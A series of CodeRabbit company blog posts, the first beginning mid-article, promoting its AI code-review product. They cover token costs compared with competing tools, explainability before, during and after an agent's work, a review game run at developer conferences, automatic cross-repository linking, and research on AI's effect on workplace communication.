For example, at launch, [Cursor's Bugbot](https://cursor.com/blog/building-bugbot) ran eight parallel review passes over every PR with majority voting to filter noise. Today it's a fully agentic design where the model "decides where to dig deeper," pulling in whatever context it wants at runtime, steered by prompts that encourage it to "investigate every suspicious pattern." The post details 40 experiments hill-climbing on quality metrics. What it never mentions is token cost. In other words, rather than being smart about it, they've decided to just throw more horsepower at it. The approach works and it produces precise reviews. But when the agent decides how much to explore, the cost of every review is effectively unbounded. Cursor’s Bugbot recently started to [charge on consumption](https://cursor.com/blog/may-2026-bugbot-changes), and it now charges $1.00–$1.50 per run, depending on PR size and complexity. A community member estimates [$7–$10.50 per PR](https://forum.cursor.com/t/the-new-usage-based-bugbot-pricing-punishes-iterative-workflows-and-power-users/161134), which lands a developer shipping 15–20 PRs a month at $105–$210 per user, per month. The inefficiency is passed to you. ## A general harness: Overbuilt for review, billed by the token The other common approach points a general-purpose frontier coding agent at your PR. The harness is built to do anything, including writing features, building spreadsheets, and drafting docs. In code review, that flexibility becomes overhead, and the system burns significant tokens rediscovering context that a purpose-built reviewer would already know. The result is an expensive review with potentially fewer bugs detected. One example is Claude Code Review, where reviews [average $15–$25 per PR](https://code.claude.com/docs/en/code-review), billed on token usage and scaling with PR complexity. At a typical velocity of 15–20 PRs a month, that's $225–$500 per user, per month. 
And the incentive structure is worth noticing: when the vendor bills by the token, every token the harness burns is revenue. ### Both roads lead to rationed reviews The hidden cost of these tools is behavioral, and over time it becomes a quality problem. When review is metered, spend controls become quality controls. These tools often let teams configure when reviews trigger, how often they run, and how much effort the reviewer applies. But the moment you start adjusting review behavior to manage a bill, you are also deciding which code gets scrutiny. Your team might review only the “high-stakes” PRs, skip the re-review after revisions, and think twice before pushing another iteration. This does not mean every skipped review ships a bug, but fewer issues are caught early, when they are cheapest to fix. Rationing review pushes that cost downstream, closer to production, where defects are harder and more expensive to fix. ## CodeRabbit: Relentlessly optimizing both quality and cost We do not believe that teams should have to choose between quality and cost. A well-built review system should be both efficient and accurate. Every irrelevant token in a model's context window dilutes its attention and raises the odds it misses a real bug. The discipline that strips waste out of the system is the same discipline that makes reviews accurate. In a [hands-on evaluation by Signal65](https://signal65.com/research/ai/evaluating-ai-code-review-tools-a-real-world-bug-detection-study/) testing five AI review tools against real historical bugs across six open-source repos, CodeRabbit found the most critical bugs, such as crashes, security vulnerabilities, and data loss, at 95.88% precision. It was the only tool to lead on both dimensions simultaneously. The nearest competitor on precision found 28% fewer critical bugs. [Martian’s evaluation](https://codereview.withmartian.com) showed the same pattern. 
CodeRabbit leads on F1 score and, more importantly for code review, recall: the measure of how many real issues a system catches. ![Scatter plot: CodeRabbit surpasses competitors in AI code review precision and critical bug detection.](https://victorious-bubble-f69a016683.media.strapiapp.com/image1_8d5d48b084.png) Every PR gets that same caliber of review, giving teams the confidence to merge and ship. Under the hood, that outcome comes from two approaches (token and cost optimization) and three key technologies (Context discipline, Smart LLM Routing, and Prompt Caching) working together. ![CodeRabbit's optimization diagram, detailing token, cost, context discipline, LLM routing, and prompt caching.](https://victorious-bubble-f69a016683.media.strapiapp.com/image2_858d76639c.png) ### Token optimization: Engineering the context Better reviews come from [better-selected context](https://www.coderabbit.ai/blog/context-engineering-ai-code-reviews). This is known as context discipline, a subset of [context engineering](https://www.coderabbit.ai/blog/the-art-and-science-of-context-engineering). CodeRabbit has built this technology into its context engine, so the LLM is neither overwhelmed with irrelevant information nor missing the critical context that would make the review more accurate. **Distillation at every layer.** Every context source, including the code graph, MCP integrations, documentation, coding guidelines, learnings, and static analysis output, passes through a processing layer that extracts only what's relevant to the PR at hand. CodeRabbit deliberately spends a majority of its input tokens in this enrichment phase to give the reviewer better context. A function your PR calls might be hundreds of lines long, but the review agent may only need a precise summary of what it does. 
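To make the distillation idea concrete, here is a minimal sketch, assuming a Python codebase and using only the standard-library `ast` module. It is not CodeRabbit's implementation: the `distill_function` helper and the sample `apply_discount` function are hypothetical, and a real distillation layer would do far more than read a docstring. The point is only that a reviewer's context can carry a one-line summary of a called function instead of its full body.

```python
import ast

# Hypothetical source for a function that a PR happens to call.
EXAMPLE_SOURCE = '''
def apply_discount(order, rate):
    """Apply a percentage discount to every line item in the order.

    Imagine hundreds of lines of implementation detail below.
    """
    total = 0
    for item in order:
        total += item * (1 - rate)
    return total
'''


def distill_function(source: str, name: str) -> str:
    """Return the signature and first docstring line of function `name`.

    Illustrative stand-in for a distillation step: the body is dropped,
    and only a compact summary is kept for the reviewer's context.
    """
    tree = ast.parse(source)
    for node in ast.walk(tree):
        if isinstance(node, ast.FunctionDef) and node.name == name:
            signature = f"def {node.name}({ast.unparse(node.args)})"
            doc = ast.get_docstring(node) or ""
            summary = doc.splitlines()[0] if doc else "(no docstring)"
            return f"{signature}: {summary}"
    raise ValueError(f"function {name!r} not found")


summary = distill_function(EXAMPLE_SOURCE, "apply_discount")
print(summary)
```

The summary is a small fraction of the original source, which is the trade the paragraph above describes: spend effort up front selecting context so the review model reads less and attends to more of what matters.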
**Domain expertise instead of open-ended exploration.** At CodeRabbit, we approach review as experienced engineers: we know the baseline signals a good reviewer needs before it starts reasoning. So we do not leave that discovery entirely to the agent. CodeRabbit uses a [hybrid AI approach](https://www.coderabbit.ai/blog/pipeline-ai-vs-agentic-ai-for-code-reviews-let-the-model-reason-within-reason) to code review, combining deterministic analysis with agentic reasoning. It builds a deterministic code graph for every PR, so by the time the agentic steps begin, the agent already understands the architecture, the call paths, and where the relevant code lives. Its discovery path is narrow by design: we tell it where to start, so it does not have to spend extra tokens figuring out where to look. ![CodeRabbit's diagram contrasts an agent exploring a maze with a clear, mapped path.](https://victorious-bubble-f69a016683.media.strapiapp.com/image3_a61208e390.png) ### Cost optimization: Engineering the spend Cost optimization is making every remaining token as cheap as possible without losing quality. **Smart LLM Routing** CodeRabbit has a dedicated engineering team continuously evaluating and benchmarking models to understand where each one improves the system, where it simply adds cost, and where a smaller model can do the job better. Compact models handle distillation, while the largest multi-step reasoning models are reserved for the review agent, where deeper analysis pays off. Larger models are not automatically better, and when a task does not require that level of reasoning, they can add latency, noise, and unnecessary complexity. Per-task routing keeps each part of the system matched to the work it is best suited to do, improving both efficiency and review quality. **Intelligent incremental reviews using Prompt Caching** CodeRabbit treats every follow-up review as incremental. 
Unchanged code is not reviewed from scratch, and stable parts of long prompts can be cached instead of being reprocessed on every iteration. This is known as Prompt Caching, and it allows the reviewer to focus its attention, reasoning, and tokens on what actually changed. ### Purpose-built efficiency, passed on to customers The token and cost optimizations are passed on to our customers. Many teams start by building their own AI review systems and do not realize how quickly token spend adds up, especially when a frontier model is used for every task in the review pipeline. Some customers tell us they are already spending thousands of dollars a month on tokens alone for small teams, and that the approach does not scale. Token cost is only part of the problem. Model routing, context distillation, benchmarking, and keeping up with every new model release require expertise and infrastructure that most teams do not have the time to build. CodeRabbit absorbs that complexity and turns it into business value for customers. ### A little optimization goes a long way In an internal experiment, our VP of AI, David Loker, built a simple review system with no domain intelligence or context engineering. It churned through roughly 200,000 tokens to find a single bug. With a small amount of domain-informed optimization, the updated version found the same bug with about 18,000 tokens total: roughly 17,000 tokens for the diff itself, plus only about 1,000 additional tokens of targeted context. That is a 91% reduction in total tokens! ### CodeRabbit delivers the best ROI in AI code review And that was one simple optimization loop. As a pioneer in AI code review, CodeRabbit has spent the past three years refining the engineering and technology behind context discipline, smart LLM routing, and prompt caching for AI review. That accumulated optimization is passed directly to customers. 
We know, and continue to refine, which context matters, which signals add noise, and which review patterns actually catch bugs. That is how CodeRabbit delivers the best ROI for code review. Teams get high performance, predictable seat-based pricing, and flexible usage-based add-ons for high-throughput agentic loops, so they can ship high-quality code with confidence. ## Maximize merges, not tokens The point of AI code review is not to consume more tokens, but to help teams ship better code faster, with fewer production issues and less of a review bottleneck. That is what CodeRabbit delivers: high-quality reviews on every PR. Developers get continuous feedback without wondering whether another review is worth the bill, and engineering leaders get the confidence that review quality is scaling with the team, not being rationed by token spend. Mergemaxxing is the better metric: every PR reviewed, real issues caught early, developers free to iterate, and code shipped with confidence. Out with token maximization. In with merge maximization. Ready to ship high-quality code with confidence? Start a [14-day free trial](https://app.coderabbit.ai/login???free-trial) or [talk to our sales team](https://www.coderabbit.ai/contact-us/sales) to see what best-in-class review performance looks like on your repos at a cost you can predict.
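The figures quoted in this post can be reproduced with a few lines of arithmetic. The sketch below is only a sanity check: the helper names are illustrative, and the inputs are the per-PR estimates, the 15–20 PRs per month, and the 200,000 and 18,000 token counts cited above.

```python
def monthly_cost(per_pr_low, per_pr_high, prs_low, prs_high):
    """Return the (low, high) monthly cost per developer for metered review."""
    return per_pr_low * prs_low, per_pr_high * prs_high


def token_reduction(before, after):
    """Return the fractional reduction in tokens between two runs."""
    return (before - after) / before


# Per-PR estimates and monthly PR volume as quoted in the post.
bugbot_monthly = monthly_cost(7.00, 10.50, 15, 20)
general_harness_monthly = monthly_cost(15.00, 25.00, 15, 20)

# Token counts from the internal experiment described in the post.
reduction = token_reduction(200_000, 18_000)

print(f"Bugbot estimate: ${bugbot_monthly[0]:.0f}-${bugbot_monthly[1]:.0f} per user, per month")
print(f"General harness: ${general_harness_monthly[0]:.0f}-${general_harness_monthly[1]:.0f} per user, per month")
print(f"Token reduction: {reduction:.0%}")
```

The ranges multiply the low per-PR cost by the low PR count and the high by the high, which is how the $105–$210 and $225–$500 figures are derived.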

Before, during, after: The three moments AI Agents earn your trust

Priyanka Kukreja — Mon, 15 Jun 2026 00:00:00 GMT

We’ve moved past the era of questioning AI *capability*. Now, the bottleneck is *trust*. In [our last post](https://www.coderabbit.ai/blog/do-you-trust-your-ai-agent) on the topic of Explainability, we drew a sharp line between observability and explainability: what the agent did vs. why it did it. We established that humans need explainability for three distinct jobs: verification, debugging, and auditability. But where do these explanations actually belong in a developer's day-to-day workflow? If you wait until the agent is completely done to show a summary, you’ve already lost the user. To serve those three critical jobs, explainability must be woven directly into the product workflow. Let’s look at exactly where those moments live. ## Three futures, one common thread To understand why workflow placement matters, look at where the entire AI industry is heading. Anthropic recently published [an analysis of AI development scenarios](https://www.anthropic.com/institute/recursive-self-improvement), laying out three distinct paths: ![Diagram comparing three phases of human-AI workflow: Stall, Compounding, and Recursive Self-Improvement.](https://victorious-bubble-f69a016683.media.strapiapp.com/3_distinct_paths_21a147115a.png) * In the first scenario: Progress stalls, but today's already-powerful models diffuse across the economy. * In the second scenario: AI labs keep compounding efficiency gains, with humans still setting direction and judging results. * In the third scenario: AI systems begin recursively improving themselves, and humans move "most of our effort towards oversight, validation, and verification." Notice what happens to the human role in the (more likely) second and third scenarios. Humans stop being the ones doing the work and instead start verifying it. Anthropic says this is already happening inside their own walls, as more than 80% of the code merged into their codebase is now written by Claude. 
And as code generation accelerated, human review became the bottleneck. They invoke [Amdahl's law](https://lawsofsoftwareengineering.com/laws/amdahls-law/) — speed up one part of a process, and the overall pace gets capped by the parts that didn't speed up. That's the thread connecting all three futures. Whichever one we land in, the scarce human activity isn't writing the code, but rather deciding whether to trust it. ## The limits of trusting outcomes For the past year, the industry’s central question regarding AI agents was purely about *capability*. We asked: Can the agent do X? {X: Fix the bug | Refactor the service | Run the experiment | etc}. We now have our answer from both industry benchmarks and real-world usage data. Consider the sheer velocity of agentic output: * **Commit Volatility:** GitHub processed roughly a billion commits in all of 2025; by mid-2026, it was tracking 275 million commits a week ([reference](https://quasa.io/media/github-s-ai-agent-tsunami-275-million-commits-a-week-14-billion-projected-for-2026-and-the-platform-is-starting-to-crack)) —putting the industry on pace for 14 billion commits this year. Agents are now committing code at machine speed. * **Network Traffic:** Cloudflare reported that weekly requests generated by autonomous AI agents more than doubled across its network in a single month ([reference](https://markets.financialcontent.com/stocks/article/marketminute-2026-2-18-the-agentic-internet-arrives-cloudflare-surges-13-on-record-revenue-and-ai-pivot)). * **Task Horizon:** METR’s measurements show that the length of time an agent can reliably operate is doubling roughly every four months. Agents that maxed out at four-minute tasks two years ago can now run for twelve hours unattended ([reference](https://metr.org/blog/2026-1-29-time-horizon-1-1/)). What drives these sticky adoption curves is a foundational trust in outcomes. 
Developers have watched agents close enough tickets, fix enough flaky tests, and ship enough working PRs that capability is not even a question anymore. But "trusting the outcome" has an expiration date. As agents take on longer tasks with a vastly larger blast radius, the sheer volume of edge cases that fall outside the "agent is usually right" window starts to compound. If your product is hitting this stage, first: congratulations. But second: good luck. You have reached a volume of agentic output that makes line-by-line human review mathematically impossible. That is the ultimate squeeze. You have more code output than you can humanly manage to verify, yet the stakes of a failure have never been higher. The only way to navigate this AI-first world is to build AI tooling that makes explainability cheap. Which is to say: **every AI tool is on an inevitable path to becoming an explainability tool.** ![Multiple people, labeled 'AI TOOL', aim guns in a room, appearing to be a meme.](https://victorious-bubble-f69a016683.media.strapiapp.com/image1_20e15014f8.png) Yes, there's an obvious punchline here: who explains the explainer? An AI tool explaining an AI tool that's explaining another AI tool, all the way down the pews. But the recursion bottoms out in the same place it always has — a human. The point of the explainability stack in our first [post on explainability](https://www.coderabbit.ai/blog/do-you-trust-your-ai-agent) wasn’t to add infinite layers of watchers; it's to make sure that wherever a human sits in that chain, the "why" reaching them is actionable. The weights are commoditizing across foundational models, so the products that win the next phase won't be the ones with marginally better models. They'll be the ones that make the human at the end of the chain fast, accurate, and a little less *miserable ;-)* ## Explainability workflow Most teams treat explainability as a post-hoc artifact: the agent finishes, then produces a summary. 
That's only one-third of the job. True explainability happens at three distinct moments, and each one needs a different kind of "why." ### 1\. Before the work: show me your thinking ![Brain icon with a circular loading indicator and text 'Before the work, Explaining the thinking'.](https://victorious-bubble-f69a016683.media.strapiapp.com/thinking_7f36bb75b5.png) The cheapest place to catch a bad decision is before any work happens. Before an agent touches a single file, it should be able to answer: here's what I understood you to be asking for, here's how I'm breaking it into steps, and here's why this approach over the alternatives. This is the reasoning and planning layer, and it's where intent mismatches surface. Say you ask an agent to "fix the flaky checkout test." One valid plan is to find and fix the race condition causing the flake. Another is to add a retry wrapper. A third is to delete the test entirely. While all three technically "fix” the problem, your intent was only one of them. A plan surfaces these misalignments early on, helping redirect your agent before it burns through your tokens and/or hours of your afternoon trying to debug the aftermath. >*The question your product must answer at this stage:* *Does the agent understand my intent, and does the decomposition of the task align with that intent?* ### 2\. During the work: show me your explorations ![Orange dotted lines connect squares on a dark background, illustrating a work process with text.](https://victorious-bubble-f69a016683.media.strapiapp.com/explorations_8413370bca.png) Agents don't walk a straight line from a prompt to a PR. They branch, hit dead ends, backtrack, and recalibrate. That exploration is invisible in the final diff, but non-negotiable for the user to build trust. What you want here isn't a raw tool log. Our original [post](https://www.coderabbit.ai/blog/do-you-trust-your-ai-agent) on explainability covered why "show logs" fails everyone. 
You want the decision trace: which paths the agent explored, which ones turned out to be no-ops, and crucially, what specific piece of information it saw before committing to a branch. For example, "Explored the caching approach, found that the cache layer is bypassed for authenticated requests, and switched to fixing the query instead" lets a reviewer verify a judgment call in five seconds. If that same information were scattered across 400 lines of raw tool calls, it would be effectively hidden for all intents and purposes even though your AI product “handles explainability”. >*The question your product must answer at this stage:* *Is the agent following the correct chain of thought? Did it pick the right paths, feed them valid inputs, and correctly interpret what came back before moving on?* ### 3\. After the work: show me the impact ![A network graph shows a central node connecting to several highlighted orange nodes and paths.](https://victorious-bubble-f69a016683.media.strapiapp.com/blast_radius_24878be302.png) This part of your workflow has the highest stakes, even though it is the most frequently missed. An agent hasn't explained its work until it has explained the *all-encompassing consequences* of that work, including and especially the ones that aren't visible in the diff right in front of you. A summary of code changes is just a PR description. Only a thorough showcase of the full range of impact is a real explanation. A common product mistake is building the former but believing it is the latter. Consider an example. An agent opens a PR with a one-line change: it renames an enum value from `cancelled` to `canceled` to fix an inconsistent spelling across the codebase. The diff is clean. The type checker is happy. Every test in the repo passes, because the agent dutifully updated them too. By every signal available in the PR, this is the safest change imaginable — a simple typo fix. Except that value doesn't just live in this repo. 
It's serialized into events on a queue, and a billing service two hops downstream string-matches on `cancelled` to stop invoicing a subscription. Nothing errors. Nothing pages. The billing service just quietly stops recognizing cancellations, and customers who canceled keep getting charged. A reviewer who only sees the diff is verifying a spelling fix. A reviewer who is shown the full blast radius (*this value crosses a service boundary, and here is who consumes it*) is verifying the actual decision. This is not a one-off edge case. It's a major gap in how we review code today. Code review has always anchored on what's immediately in front of us, but the consequences of a change rarely respect the boundaries of a diff. This is why we believe explainability at this stage must be held to a high bar: not just "what changed" but a thorough understanding of what the system will do differently because of it. >*The question your product must answer at this stage:* *What does this change actually do, exhaustively, including the parts I cannot see?* ## Explainability is the product Step back from the three stages in the workflow and look at what they have in common. * Before the work, the agent explains its intent. * During the work, it explains its judgment. * After the work, it explains its consequences. ![Timeline illustrating "During the work" and "After the work" with specific explanations.](https://victorious-bubble-f69a016683.media.strapiapp.com/Interior_explaining_7a5bad9757.png) These aren't three features to be checked off a roadmap; they are one single obligation, applied at the three points where a human has to make a decision about the agent's work: whether to let it proceed, or take control and maneuver it in a different direction. That is the real shape of the oversight role the industry is converging on. 
A human overseeing agents isn't reading every line; they are answering those three questions, over and over, across more output than any person can inspect directly. The quality of their oversight is therefore bounded by the quality of the explanations reaching them. If the industry's own forecasts are right and the human role converges on oversight and validation, then explainability isn't just a nice-to-have layered on top of AI tools. It is the product. At [CodeRabbit](https://coderabbit.ai/), that's the assumption we're building on. Across everything we ship, the design question is the same: what does the human verifying this work need to know, and at which moment do they need to know it?
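The enum-rename scenario from the "After the work" section can be sketched in a few lines. This is a hypothetical illustration, not code from any real system: the function names, the event shape, and the string match in the consumer are all assumptions made to show how the failure stays silent.

```python
import json


def publish_subscription_event(status: str) -> str:
    """Producer repo (hypothetical): serialize the enum value onto a queue."""
    return json.dumps({"type": "subscription.updated", "status": status})


def billing_should_stop_invoicing(message: str) -> bool:
    """Downstream billing service (hypothetical): string-matches the old spelling."""
    return json.loads(message)["status"] == "cancelled"


# Before the rename: the consumer recognizes the cancellation.
stops_before = billing_should_stop_invoicing(publish_subscription_event("cancelled"))

# After the rename: nothing raises, but the match silently fails.
stops_after = billing_should_stop_invoicing(publish_subscription_event("canceled"))

print(stops_before, stops_after)
```

Nothing in the producer's diff, type checker, or tests touches the consumer, which is why an explanation of impact has to name who reads the value on the other side of the service boundary.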

We watched developers approve bugs in 30 seconds

Konrad Sopala — Fri, 12 Jun 2026 00:00:00 GMT

Recently, we turned code review into a speed competition at CodeRabbit’s app.js conference booth. At app.js, JS Nation, and React Summit, we asked hundreds of developers how they really review code. The answers were a lot less funny than the game. The rules were simple. A code snippet hits the screen, and attendees have thirty seconds to approve or request changes from their phone. Faster correct answers score more, so you're deciding under pressure. Once the votes lock, we reveal the bugs people missed and their fixes. ![Group of people networking around a display at an indoor event or conference.](https://victorious-bubble-f69a016683.media.strapiapp.com/image3_bbed7a3731.jpg) Every round, we called out the current leader and the fastest correct answer, so way more people got a "THAT WAS ME" moment than just the three who'd actually take home prizes. ![React stopwatch code next to a poll: 9 'Approve', 12 'Request changes'.](https://victorious-bubble-f69a016683.media.strapiapp.com/image1_6879bd844c.png) Round after round, the same thing kept happening: a bug would go up, the clock would run, and a chunk of the room would confidently wave it through. The "obviousness" of a bug turned out to have almost nothing to do with whether people caught it at speed. %[https://x.com/yoimkonrad/status/2060332889175109989?s=46] ## Then we talked to you Across those three conferences, including between game rounds, we talked with hundreds of developers about how you actually review code. The same themes came up again and again, and they're worth recapping, because most of them contradict how teams think review works. ![Audience attending a tech presentation with a speaker on stage and a 'swim' logo.](https://victorious-bubble-f69a016683.media.strapiapp.com/image2_579ab2c378.png) ## It's built right in The single most common setup we heard: whatever review bot came bundled with their code host, because it's already in the PR and it's one less tab to open. We get the logic. 
It's the office-fridge sandwich of code review. It's right there, and the deli is a whole walk away. But these were often the same developers who told us, in the same conversation, that review is one of their bottlenecks to shipping. If something is genuinely slowing your team down, "it came pre-installed" is a strange bar to set for the tool that's supposed to fix it. We think that bar is worth raising: code reviews should read like a teammate left them, not a linter with a thesaurus, and the tool should bend to fit your repo instead of the other way around. Everything for code review should be built around review quality. ## The agent said it's fine, so it's fine A good chunk of the developers we spoke with review code with the same coding agent that writes the code. Not as a dedicated review step; the tool is already open, it wrote the code, so it gets to check the code too. What worries us is what happens after the agent answers: nothing. It hands down a verdict and the developer takes it. No pushback, no follow-up questions, no seam to pry open. The whole interaction runs in one direction. So judgment gets outsourced to a tool that was built to generate code, not to have a conversation about a pull request, and then even that conversation stops. Review is supposed to be a back-and-forth. Take it as-is and what you're holding is a fortune cookie. ## I could build a better, cheaper version myself Then there's the developer who's going to build it in-house. The model's right there, the API is cheap, how hard can it be? A day here and there and they'll have a reviewer tailored to their stack, at a fraction of what the dedicated tools charge. It is not an easy task. 
We're not going to relitigate the whole thing here, because we already did, in detail: [your internal AI code review tool costs more than you think.](https://www.coderabbit.ai/blog/your-internal-ai-code-review-tool-cost-more-than-you-think) The short version is that the model call is the cheap part. The expensive part is everything around it: the context engineering, the noise suppression so it doesn't flag every line of the diff, the integrations, the maintenance, the engineer-months now going into a code review tool instead of the product you're actually paid to ship. The "fraction of the cost" math only works if you never assign it a salary. Building your own is the most expensive way to learn that the hard part was never the AI. ## What all developers at the conferences agreed on Strip away the tooling arguments, and there was one belief that nobody disagreed with: We ship too much code to review it all by hand. That ship has sailed, and we aren’t going back to that approach. The volume of code generated by agents is up and to the right, and it isn’t declining anytime soon. Developers are now manually writing less code, but reviewing far more than ever before. That is the job now for developers, and it’s a hard job. At times it is cognitive overload, as the diffs are getting larger, but we are still reviewing code in platforms that were meant for human-generated code and not AI-generated code. AI code review isn't a nice-to-have your team adopts when it's mature enough. It's the load-bearing wall of how software gets shipped now. That's the category we set out to define, and it's the rare thing everyone at a conference already agrees with before you finish the sentence. ![Four smiling team members stand by the CodeRabbit AI code review booth at an event.](https://victorious-bubble-f69a016683.media.strapiapp.com/image5_aa733f6bcc.png)

Automatic Repository Linking: Cross-repo context without manual setup

Erfan Al-Hossami — Thu, 11 Jun 2026 00:00:00 GMT

A pull request can look safe in one repository and still break another service that depends on it. That is why we shipped [Multi-Repo Analysis](https://www.coderabbit.ai/blog/Coderabbit-multi-repo-analysis): to help CodeRabbit review changes with context from related repositories. The challenge was setup. Teams still had to tell CodeRabbit which repositories were connected, and that list could go stale as services, packages, and ownership changed. [Automatic Repository Linking](http://docs.coderabbit.ai/knowledge-base/automatic-repository-linking) removes that manual step. CodeRabbit can now detect related repositories across your organization and use them as review context, so cross-repo impact is easier to catch before you merge. %[https://youtu.be/cKE6q5JLQ8Y] ## What Automatic Repository Linking does Automatic Repository Linking discovers and links related repositories across your organization. It first analyzes signals that define a dependency, such as import graphs, dependency manifests, and shared code patterns. It then links the repositories that depend on each other, so CodeRabbit knows your architecture without anyone maintaining a list. What that gives your team: * **Cross-repo context with zero setup.** Related repositories get linked automatically. You do not need to maintain a static list of related repositories as services and packages evolve. * **Links that reflect how your code fits together.** Because the connections come from the code itself, they map to real technical dependencies and stay current as your services evolve. * **The same reviews, on more of your code.** Auto-discovered links feed directly into CodeRabbit's [research agent](https://www.coderabbit.ai/blog/agentic-code-review-vs-rag-multi-repo-analysis), which explores linked repositories in real time and surfaces breaking changes with exact files and line numbers before you merge. Auto-linked repositories are stored separately from manual links. Manual links are not overwritten. 
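
To make the idea of linking from code-level signals concrete, here is a toy sketch. It is not CodeRabbit's implementation: the `Repo` shape, the `infer_links` function, and the repository and package names are all hypothetical, and it looks at only one signal (declared package dependencies) rather than the broader set described above.

```python
from dataclasses import dataclass, field


@dataclass
class Repo:
    # Hypothetical, simplified view of a repository for illustration only.
    name: str
    publishes: set[str] = field(default_factory=set)   # packages this repo produces
    depends_on: set[str] = field(default_factory=set)  # packages named in its manifests


def infer_links(repos: list[Repo]) -> dict[str, set[str]]:
    """Map each repo to the repos it depends on, based on declared packages."""
    # Index every published package by the repo that owns it.
    owner = {pkg: repo.name for repo in repos for pkg in repo.publishes}
    links: dict[str, set[str]] = {repo.name: set() for repo in repos}
    for repo in repos:
        for pkg in repo.depends_on:
            upstream = owner.get(pkg)
            # Skip third-party packages and self-references.
            if upstream is not None and upstream != repo.name:
                links[repo.name].add(upstream)
    return links


repos = [
    Repo("billing-api", publishes={"billing-client"}, depends_on={"shared-types"}),
    Repo("shared-types", publishes={"shared-types"}),
    Repo("web-app", depends_on={"billing-client", "shared-types", "react"}),
]
links = infer_links(repos)
```

In this toy organization, `web-app` ends up linked to both `billing-api` and `shared-types`, while the third-party `react` dependency is ignored because no repository in the organization publishes it.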
Automatic Repository Linking also builds on CodeRabbit’s knowledge base. If your organization has opted out of knowledge base features, both Multi-Repo Analysis and Automatic Repository Linking are disabled. ## How it works and why our approach is different ![Diagram showing CodeRabbit's automatic repository linking, connecting a service to related repositories.](https://victorious-bubble-f69a016683.media.strapiapp.com/image1_a9cfed04eb.png) Cross-repo context has become a useful feature for coding agents and code reviewers, yet most approaches still depend on a human to draw the map. Some tools widen their view beyond a single repository only when you scope that context by hand, whether by passing extra directories to the agent, opening a multi-root workspace, or declaring related repositories in a configuration or agents file. Others automate the discovery step but infer relationships from team activity, such as which contributors have recently committed where. That can show how people work, yet it does not prove that two repositories are actually related. By contrast, Automatic Repository Linking starts from code-level evidence. CodeRabbit looks across eligible repositories in your organization for signals such as imports, dependency manifests, API usage patterns, contracts, and repository README files. When those signals point to a real relationship, CodeRabbit links the repository as review context. During review, CodeRabbit combines those auto-detected links with any repositories your team already configured manually. The multi-repo research agent can then inspect the linked repositories and surface downstream impact with concrete files and lines. The Review info section shows which repositories were considered. ## Get started %[https://youtu.be/ckKYd1-e1CI] You should not have to keep a manual map of every service, package, and repository relationship in your organization. 
With Automatic Repository Linking, CodeRabbit keeps that context closer to the code, so reviews can catch downstream impact before it reaches production. Automatic Repository Linking is available for Pro plus and Enterprise customers. Enable it in your knowledge base settings and start sharing context between your repositories. **Learn more** * [Introducing Multi-Repo Analysis](https://www.coderabbit.ai/blog/Coderabbit-multi-repo-analysis) * [Why agentic code review beats RAG for multi-repository analysis](https://www.coderabbit.ai/blog/agentic-code-review-vs-rag-multi-repo-analysis) * [Multi-Repo Analysis documentation](https://docs.coderabbit.ai/knowledge-base/multi-repo-analysis)

Humans don’t have an API

David Kravets — Wed, 10 Jun 2026 00:00:00 GMT

Are we treating coworkers like AI agents? Take a look at your recent Slack messages, Google Docs comments, emails, or the transcripts of your last few video calls with colleagues. How many of them began with a greeting, or provided context for a sudden request? Now look at your chat history with your preferred AI assistant. One of the more curious features of the modern workplace is that these two columns of text can sometimes look surprisingly similar. As generative AI becomes embedded in daily work, the line between how we communicate with software and how we communicate with one another can feel less distinct than it once did. Direct requests, immediate responses, and highly task-focused exchanges have become a routine part of interacting with AI systems. As organizations optimize for efficiency, it is worth considering how those habits may influence communication in the workplace as well. ## **The side effects of talking to machines** A common response to concerns about AI etiquette is straightforward. The system has no feelings, so how we speak to it doesn't matter. However, behavioral scientists have long understood that habits formed in one context often spill over into others. So, does spending hours each day issuing commands to conversational AI systems change how we communicate when another human being is on the receiving end? The evidence is still emerging. However, new research suggests that prolonged interaction with AI systems may influence interpersonal communication styles in subtle but meaningful ways. Generative AI rewards directness. It responds instantly, stays focused on the requested task (unless it hallucinates), and converts instructions into results with remarkable speed. The interaction is efficient, goal-oriented, and largely free of the social rituals that characterize human conversation. Over time, it is reasonable to wonder whether those expectations begin migrating into our human relationships as well. 
Human relationships are built through repeated interactions that create trust, understanding, and shared context over time. These moments may appear inefficient when measured purely by output, yet they help build the goodwill and mutual confidence that make productive collaboration possible. When we begin treating coworkers like conversational interfaces, like APIs, those relational investments become easier to skip. ## **What some emerging literature says** Because generative AI arrived so quickly, research on its social consequences is still catching up to the reality that millions of people are spending hours each day interacting with machines capable of producing human-like conversation. Nevertheless, research is beginning to examine how those interactions may influence human relationships and workplace behavior. ### **The AI "social forcefield"** Researchers Christoph Riedl, Saiph Savage, and Josie Zvelebilova explored this phenomenon in their paper [*Cognitive Spillover in Human-AI Teams*](https://arxiv.org/abs/2407.17489). The researchers conducted two randomized experiments to examine whether interactions with AI influence subsequent human-to-human communication. Across both experiments, they found evidence of what they call "cognitive spillover," where the effects of AI exposure carried forward into later interactions between people. According to the authors, AI exposure influenced shared language, collective attention, shared mental models, and social cohesion. The researchers describe this phenomenon as an "AI social forcefield." The term reflects the paper's central argument that AI shapes the social and cognitive environment in which collaboration occurs. In the researchers' framing, AI functions as part of the environment that influences how people communicate, coordinate, and develop shared understanding. Their findings suggest that AI influences more than the quality or speed of work. 
It can also shape how people focus their attention, exchange information, and build common ground with one another. The paper focuses on controlled experiments rather than long-term workplace behavior. Its findings nevertheless raise an important question for organizations rapidly adopting AI. If interactions with AI can influence subsequent human-to-human communication, what happens when those interactions become a daily part of work? ### **A warning flare about human relationships** If the cognitive spillover research offers evidence that AI can influence human communication, another paper raises a broader concern about where those effects might lead. In [*Chatbots and Human-Human Relationships: The Need for Research on Potential Downstream Harms from Generative AI*](https://www.tandfonline.com/doi/full/10.1080/13668803.2026.2623500?), researchers Justin Keeler and Brett Murphy issue what amounts to a warning flare. Their central argument is that society is adopting conversational AI systems far faster than researchers understand their long-term effects on human relationships. Rather than presenting experimental findings, the paper identifies a set of potential downstream harms that the authors believe warrant further study. Among the concerns they discuss are reduced social interaction between people, spillover effects from chatbot interactions into human relationships, and the possible erosion of social abilities. A central theme of the paper is reciprocity. The authors note that conversational systems can provide relational benefits to users without requiring reciprocal efforts in return. Human relationships operate differently. They depend on mutual obligation, compromise, empathy, and ongoing investment from both participants. The researchers argue that this difference raises important questions about how widespread interactions with conversational AI may influence human relationships over time. 
